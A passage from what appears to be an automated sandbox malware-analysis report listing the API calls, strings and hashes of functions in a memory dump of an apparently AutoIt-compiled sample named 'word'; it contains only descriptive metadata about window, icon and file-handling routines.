                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID: Color$Pixel$Window$Release$ClientLongMessageModeObjectRectSendStockText
                                                                    • String ID: X1
                                                                    • API String ID: 1744303182-2397719451
                                                                    • Opcode ID: c697551d262e08263a45fd1ab6b47457a8b4de30e4a023901e5f3e03e0b3260a
                                                                    • Instruction ID: f407f88e1fc9bdd08975b2e96734b256c85d8f08b0ead5e1f8dbf5832e348edb
                                                                    • Opcode Fuzzy Hash: c697551d262e08263a45fd1ab6b47457a8b4de30e4a023901e5f3e03e0b3260a
                                                                    • Instruction Fuzzy Hash: AD6148315442016BE3209B388C88BBFB7A4FB49324F54079EF9A8973D0D7B99C51D76A
                                                                    APIs
                                                                    • _wcslen.LIBCMT ref: 00454DCF
                                                                    • _wcslen.LIBCMT ref: 00454DE2
                                                                    • __wcsicoll.LIBCMT ref: 00454DEF
                                                                    • _wcslen.LIBCMT ref: 00454E04
                                                                    • __wcsicoll.LIBCMT ref: 00454E11
                                                                    • _wcslen.LIBCMT ref: 00454E24
                                                                    • __wcsicoll.LIBCMT ref: 00454E31
                                                                      • Part of subcall function 004115D0: __wcsicmp_l.LIBCMT ref: 00411657
                                                                    • LoadImageW.USER32 ref: 00454E65
                                                                    • LoadLibraryExW.KERNEL32(?,00000000,00000032,?,?,?,?,?,?,?,?,?,00000000), ref: 00454E79
                                                                    • LoadImageW.USER32 ref: 00454EB7
                                                                    • LoadImageW.USER32 ref: 00454EFB
                                                                    • LoadImageW.USER32 ref: 00454F2C
                                                                    • FreeLibrary.KERNEL32(00000000), ref: 00454F37
                                                                    • ExtractIconExW.SHELL32(?,00000000,00000000,?,00000001), ref: 00454F94
                                                                    • DestroyIcon.USER32(?), ref: 00454FA2
                                                                    • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00454FC0
                                                                    • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00454FCC
                                                                    • MoveWindow.USER32(?,?,?,?,?,00000001), ref: 00454FF1
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID: Load$Image_wcslen$__wcsicoll$IconLibraryMessageSend$DestroyExtractFreeMoveWindow__wcsicmp_l
                                                                    • String ID: .dll$.exe$.icl
                                                                    • API String ID: 2511167534-1154884017
                                                                    • Opcode ID: 3f138871eb6b7f703bfd118eaab481945a2915db6d26b5ab3e2ea40d00a2935e
                                                                    • Instruction ID: 777b7c61fe84a0ac0f88e3bb9536c5d4e291b97e4b5026f6b39318954af55ba4
                                                                    • Opcode Fuzzy Hash: 3f138871eb6b7f703bfd118eaab481945a2915db6d26b5ab3e2ea40d00a2935e
                                                                    • Instruction Fuzzy Hash: D461D9711043016AE620DF659D85F7B73ECEF84B0AF00481EFE81D5182E7B9A989C77A
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 0$X1
                                                                    • API String ID: 0-3791290762
                                                                    • Opcode ID: 5c83202df4191ceb25da00100bb051ff7af7db6be6cd3b2f54ad306cb4a2fb3d
                                                                    • Instruction ID: a4e6889c8706d2a682ad3cc8acca51b009283e1ae9b51da70db0806919efebf9
                                                                    • Opcode Fuzzy Hash: 5c83202df4191ceb25da00100bb051ff7af7db6be6cd3b2f54ad306cb4a2fb3d
                                                                    • Instruction Fuzzy Hash: 95C104723403416BF3209B64DC46FBBB794EB95321F04453FFA45D62C1EBBA9409876A
                                                                    APIs
                                                                    • GetFileVersionInfoSizeW.VERSION(?,?), ref: 00436B4E
                                                                    • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000), ref: 00436B73
                                                                    • _wcslen.LIBCMT ref: 00436B79
                                                                    • _wcscpy.LIBCMT ref: 00436B9F
                                                                    • _wcscat.LIBCMT ref: 00436BC0
                                                                    • VerQueryValueW.VERSION(00000000,\VarFileInfo\Translation,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00436BE7
                                                                    • _wcscat.LIBCMT ref: 00436C2A
                                                                    • _wcscat.LIBCMT ref: 00436C31
                                                                    • __wcsicoll.LIBCMT ref: 00436C4B
                                                                    • _wcsncpy.LIBCMT ref: 00436C62
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID: _wcscat$FileInfoVersion$QuerySizeValue__wcsicoll_wcscpy_wcslen_wcsncpy
                                                                    • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                                    • API String ID: 1503153545-1459072770
                                                                    • Opcode ID: fcf2a6d26a61ff72761e453df09ec4af44203210470a017008fb4d7cdafd4bd2
                                                                    • Instruction ID: f4118b49cd66f9fee818cdfc0bae26735a4a754b0a3131160812af9443992caa
                                                                    • Opcode Fuzzy Hash: fcf2a6d26a61ff72761e453df09ec4af44203210470a017008fb4d7cdafd4bd2
                                                                    • Instruction Fuzzy Hash: B54115B264020137D200B7269C83EFF735CDE99715F54091FFE45A2253FA2EA69642BE
                                                                    APIs
                                                                      • Part of subcall function 004431E0: __time64.LIBCMT ref: 004431EA
                                                                    • _fseek.LIBCMT ref: 004527FC
                                                                    • __wsplitpath.LIBCMT ref: 0045285C
                                                                    • _wcscpy.LIBCMT ref: 00452871
                                                                    • _wcscat.LIBCMT ref: 00452886
                                                                    • __wsplitpath.LIBCMT ref: 004528B0
                                                                    • _wcscat.LIBCMT ref: 004528C8
                                                                    • _wcscat.LIBCMT ref: 004528DD
                                                                    • __fread_nolock.LIBCMT ref: 00452914
                                                                    • __fread_nolock.LIBCMT ref: 00452925
                                                                    • __fread_nolock.LIBCMT ref: 00452944
                                                                    • __fread_nolock.LIBCMT ref: 00452955
                                                                    • __fread_nolock.LIBCMT ref: 00452976
                                                                    • __fread_nolock.LIBCMT ref: 00452987
                                                                    • __fread_nolock.LIBCMT ref: 00452998
                                                                    • __fread_nolock.LIBCMT ref: 004529A9
                                                                      • Part of subcall function 004523CE: __fread_nolock.LIBCMT ref: 004523ED
                                                                      • Part of subcall function 004523CE: __fread_nolock.LIBCMT ref: 00452432
                                                                      • Part of subcall function 004523CE: __fread_nolock.LIBCMT ref: 0045244F
                                                                      • Part of subcall function 004523CE: _wcscpy.LIBCMT ref: 0045247D
                                                                      • Part of subcall function 004523CE: __fread_nolock.LIBCMT ref: 0045248E
                                                                      • Part of subcall function 004523CE: __fread_nolock.LIBCMT ref: 004524AB
                                                                      • Part of subcall function 004523CE: _wcscpy.LIBCMT ref: 004524D9
                                                                    • __fread_nolock.LIBCMT ref: 00452A39
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID: __fread_nolock$_wcscat_wcscpy$__wsplitpath$__time64_fseek
                                                                    • String ID:
                                                                    • API String ID: 2054058615-0
                                                                    • Opcode ID: 983239acf030dd5dbcb525efe1f3094d5bf78e470c43ee0c462dc16c64ee25c2
                                                                    • Instruction ID: 66779ec6e5012556871fefb3c18d5d4f0449fb8b445ab61f685bb60241e2a5ae
                                                                    • Opcode Fuzzy Hash: 983239acf030dd5dbcb525efe1f3094d5bf78e470c43ee0c462dc16c64ee25c2
                                                                    • Instruction Fuzzy Hash: 16C14EB2508340ABD320DF65C881EEBB7E8EFC9714F444D2FF68987241E6799544CBA6
                                                                    APIs
                                                                    • SetWindowPos.USER32(004A83D8,00000000,00000000,00000000,00000000,00000000,00000013), ref: 0044880A
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID: Window
                                                                    • String ID: 0$X1
                                                                    • API String ID: 2353593579-3791290762
                                                                    • Opcode ID: ca380a5f1b7b22306afb7d181ee8588f63c71b92ae7430e038360cbc2591eaeb
                                                                    • Instruction ID: 13976ff69904029c6bcd7d6129a783336058688c161485e0dcc644b2654616cc
                                                                    • Opcode Fuzzy Hash: ca380a5f1b7b22306afb7d181ee8588f63c71b92ae7430e038360cbc2591eaeb
                                                                    • Instruction Fuzzy Hash: 94B19DB02443419FF324CF14C889BABBBE4EB89744F14491EF991972D1DBB8E845CB5A
                                                                    APIs
                                                                      • Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734
                                                                    • GetWindowRect.USER32(?,?), ref: 004701EA
                                                                    • GetClientRect.USER32(?,?), ref: 004701FA
                                                                    • GetSystemMetrics.USER32(00000007), ref: 00470202
                                                                    • GetSystemMetrics.USER32(00000008), ref: 00470216
                                                                    • GetSystemMetrics.USER32(00000004), ref: 00470238
                                                                    • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 0047026B
                                                                    • GetSystemMetrics.USER32(00000007), ref: 00470273
                                                                    • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 004702A0
                                                                    • GetSystemMetrics.USER32(00000008), ref: 004702A8
                                                                    • GetSystemMetrics.USER32(00000004), ref: 004702CF
                                                                    • SetRect.USER32 ref: 004702F1
                                                                    • AdjustWindowRectEx.USER32(?,?,00000000,000000FF), ref: 00470304
                                                                    • CreateWindowExW.USER32 ref: 0047033E
                                                                    • SetWindowLongW.USER32(00000000,000000EB,?), ref: 00470356
                                                                    • GetClientRect.USER32(?,?), ref: 00470371
                                                                    • GetStockObject.GDI32(00000011), ref: 00470391
                                                                    • SendMessageW.USER32(?,00000030,00000000), ref: 0047039D
                                                                    • SetTimer.USER32(00000000,00000000,00000028,Function_00061E7F), ref: 004703C4
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID: System$Metrics$Rect$Window$ClientInfoParameters$AdjustCreateLongMessageObjectSendStockTimer_malloc
                                                                    • String ID: AutoIt v3 GUI
                                                                    • API String ID: 867697134-248962490
                                                                    • Opcode ID: 6ad7d68160ace8c5a334d39e0d25cb774716288c023a5a592c974d01425e03f0
                                                                    • Instruction ID: 96ed3905d942d8c5c267f8207effb08aff50268186fc7250a269a1908d1679c9
                                                                    • Opcode Fuzzy Hash: 6ad7d68160ace8c5a334d39e0d25cb774716288c023a5a592c974d01425e03f0
                                                                    • Instruction Fuzzy Hash: 27B19F71205301AFD324DF68DD45B6BB7E4FB88710F108A2EFA9587290DBB5E844CB5A
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID: __wcsicoll$__wcsnicmp
                                                                    • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                                                                    • API String ID: 790654849-1810252412
                                                                    • Opcode ID: 3ef763bd77a89c14e9ef14da431a542ecfa9ee53dca0875bc5fd58ba0035de2e
                                                                    • Instruction ID: 1b62209f2aa4de5792947d5a3aa61dcd1c874d3672784017b8f4b2c72f71c34c
                                                                    • Opcode Fuzzy Hash: 3ef763bd77a89c14e9ef14da431a542ecfa9ee53dca0875bc5fd58ba0035de2e
                                                                    • Instruction Fuzzy Hash: 7A3193B1644301A7CA00FA61DC83F5B73A85F54759F100A3FB955B61D6FA6CEA0C862F
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: >>>AUTOIT SCRIPT<<<$\
                                                                    • API String ID: 0-1896584978
                                                                    • Opcode ID: 044f2c4ecf877d2b2fc48157703a0e30c53185d3f7c6c17f150f9ffb4993ef22
                                                                    • Instruction ID: e6fbcda15cb9520e0e34bfac0f9750edaedb1b44b840e2dcfb1a2c219c195b9a
                                                                    • Opcode Fuzzy Hash: 044f2c4ecf877d2b2fc48157703a0e30c53185d3f7c6c17f150f9ffb4993ef22
                                                                    • Instruction Fuzzy Hash: 907186B2504300ABC720EB65C885FEBB3E8AF94714F148D1FF58997142E679E648C75A
                                                                    APIs
                                                                    • ExtractIconExW.SHELL32(?,?,?,?,00000001), ref: 0046FB61
                                                                    • ExtractIconExW.SHELL32(?,000000FF,?,?,00000001), ref: 0046FB7A
                                                                    • SendMessageW.USER32 ref: 0046FBAF
                                                                    • SendMessageW.USER32 ref: 0046FBE2
                                                                    • ImageList_Create.COMCTL32(00000010,00000010,00000021,?,00000001), ref: 0046FC1B
                                                                    • SendMessageW.USER32(?,00001003,00000001,00000000), ref: 0046FC3E
                                                                    • ImageList_Create.COMCTL32(00000020,00000020,00000021,?,00000001), ref: 0046FC51
                                                                    • SendMessageW.USER32(?,00001003,00000000,00000000), ref: 0046FC73
                                                                    • ImageList_ReplaceIcon.COMCTL32(?,000000FF,?), ref: 0046FC97
                                                                    • ImageList_ReplaceIcon.COMCTL32(?,000000FF,?), ref: 0046FCA5
                                                                    • SendMessageW.USER32 ref: 0046FD00
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$IconImageList_$CreateExtractReplace
                                                                    • String ID: X1
                                                                    • API String ID: 2632138820-2397719451
                                                                    • Opcode ID: 84d296b218fe0245d687438722339ecf4745b7249032fe4bb2113eafbff2dc59
                                                                    • Instruction ID: f8b2170a3f6480226351c2682443129a31dd3945ebd2779c8b18a40e734619f9
                                                                    • Opcode Fuzzy Hash: 84d296b218fe0245d687438722339ecf4745b7249032fe4bb2113eafbff2dc59
                                                                    • Instruction Fuzzy Hash: A461BF70208305AFD320DF14DC85F5BB7E4FB89B14F10492EFA85972D1E7B4A8498B66
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID: InitVariant
                                                                    • String ID:
                                                                    • API String ID: 1927566239-0
                                                                    • Opcode ID: 0ce8a0180f427c6633dd7a645a706da8f2470da33a28fd12fcc8bbcffff15558
                                                                    • Instruction ID: b17386a2766a1a739d91313a8bf0106a5dd250ff49ec0cac6ee5761d63536315
                                                                    • Opcode Fuzzy Hash: 0ce8a0180f427c6633dd7a645a706da8f2470da33a28fd12fcc8bbcffff15558
                                                                    • Instruction Fuzzy Hash: 87A1F5766146019FC300EF65D88499FB7AAFF85315F408D3EFA49C3211D77AD4098BAA
                                                                    APIs
                                                                      • Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2
                                                                    • GetForegroundWindow.USER32 ref: 0046D7C1
                                                                    • GetForegroundWindow.USER32 ref: 0046DBA4
                                                                    • IsWindow.USER32(?), ref: 0046DBDE
                                                                    • GetDesktopWindow.USER32 ref: 0046DCB5
                                                                    • EnumChildWindows.USER32 ref: 0046DCBC
                                                                    • EnumWindows.USER32(00460772,?), ref: 0046DCC4
                                                                      • Part of subcall function 00445975: _wcslen.LIBCMT ref: 00445984
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID: Window$EnumForegroundWindows_wcslen$ChildDesktop
                                                                    • String ID: ACTIVE$ALL$CLASS$HANDLE$INSTANCE$LAST$REGEXPCLASS$REGEXPTITLE$TITLE
                                                                    • API String ID: 1322021666-1919597938
                                                                    • Opcode ID: f0ae0bd5c84c8fbd9fa80e8b17a650ade3f6139d63811c55da114ce2128ba9af
                                                                    • Instruction ID: 252cd24da08a8cddfda52e39780f3f39bafd894638fb43d2866a45805a666b3e
                                                                    • Opcode Fuzzy Hash: f0ae0bd5c84c8fbd9fa80e8b17a650ade3f6139d63811c55da114ce2128ba9af
                                                                    • Instruction Fuzzy Hash: 96F1C571D143409BCB00EF61C881EAB73A4BF95308F44496FF9456B286E77DE909CB6A
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID: MessagePost$CtrlFocus
                                                                    • String ID: 0$X1
                                                                    • API String ID: 1534620443-3791290762
                                                                    • Opcode ID: f9e63eb02e17615fe0da988bcb6a2c4daaa6a1b8b309a0160d391c80e97b0828
                                                                    • Instruction ID: 7d80af5808d25915b866e76daf530f36ef8b085de22dc1c7fc8dbb607ae8adb7
                                                                    • Opcode Fuzzy Hash: f9e63eb02e17615fe0da988bcb6a2c4daaa6a1b8b309a0160d391c80e97b0828
                                                                    • Instruction Fuzzy Hash: 1591E1B1604301ABD710DF14D884BABB7A8FB89714F004A1EF99497391E7B4DC49CBAB
                                                                    APIs
                                                                    • GetLocalTime.KERNEL32(?), ref: 0045DED4
                                                                    • SystemTimeToFileTime.KERNEL32(?,?), ref: 0045DEE4
                                                                    • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 0045DEF0
                                                                    • _wcsncpy.LIBCMT ref: 0045DF0F
                                                                    • __wsplitpath.LIBCMT ref: 0045DF54
                                                                    • _wcscat.LIBCMT ref: 0045DF6C
                                                                    • _wcscat.LIBCMT ref: 0045DF7E
                                                                    • GetCurrentDirectoryW.KERNEL32(00000104,?), ref: 0045DF93
                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 0045DFA7
                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 0045DFE5
                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 0045DFFB
                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 0045E00D
                                                                    • _wcscpy.LIBCMT ref: 0045E019
                                                                    • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 0045E05F
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID: CurrentDirectory$Time$File$Local_wcscat$System__wsplitpath_wcscpy_wcsncpy
                                                                    • String ID: *.*
                                                                    • API String ID: 3201719729-438819550
                                                                    • Opcode ID: 89541da3f554ebb8d42e95f45bc66f31ca584aff69b040987f949bd9346ecb30
                                                                    • Instruction ID: 9ef8ac46b2ec3f8a2b66e183c5d6435db2730cdd54c1860218fefef83dfd89d7
                                                                    • Opcode Fuzzy Hash: 89541da3f554ebb8d42e95f45bc66f31ca584aff69b040987f949bd9346ecb30
                                                                    • Instruction Fuzzy Hash: D061A7B25043049BC724EF65C881E9FB3E8AF94704F048E1EF98987241DB79E949CB96
                                                                    APIs
                                                                    • DragQueryPoint.SHELL32(?,?), ref: 0046F2DA
                                                                      • Part of subcall function 00441CB4: ClientToScreen.USER32(00000000,?), ref: 00441CDE
                                                                      • Part of subcall function 00441CB4: GetWindowRect.USER32(?,?), ref: 00441D5A
                                                                      • Part of subcall function 00441CB4: PtInRect.USER32(?,?,?), ref: 00441D6F
                                                                    • SendMessageW.USER32(?), ref: 0046F34C
                                                                    • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 0046F355
                                                                    • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 0046F37F
                                                                    • _wcscat.LIBCMT ref: 0046F3BC
                                                                    • SendMessageW.USER32(?,000000C2,00000001,?), ref: 0046F3D1
                                                                    • SendMessageW.USER32(?,000000B0,?,?), ref: 0046F3E3
                                                                    • SendMessageW.USER32(?,000000B1,?,?), ref: 0046F3F1
                                                                    • SendMessageW.USER32(?,000000B1,?,?), ref: 0046F40E
                                                                    • DragFinish.SHELL32(?), ref: 0046F414
                                                                    • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 0046F4FC
                                                                    Strings
                                                                    Memory Dump Source
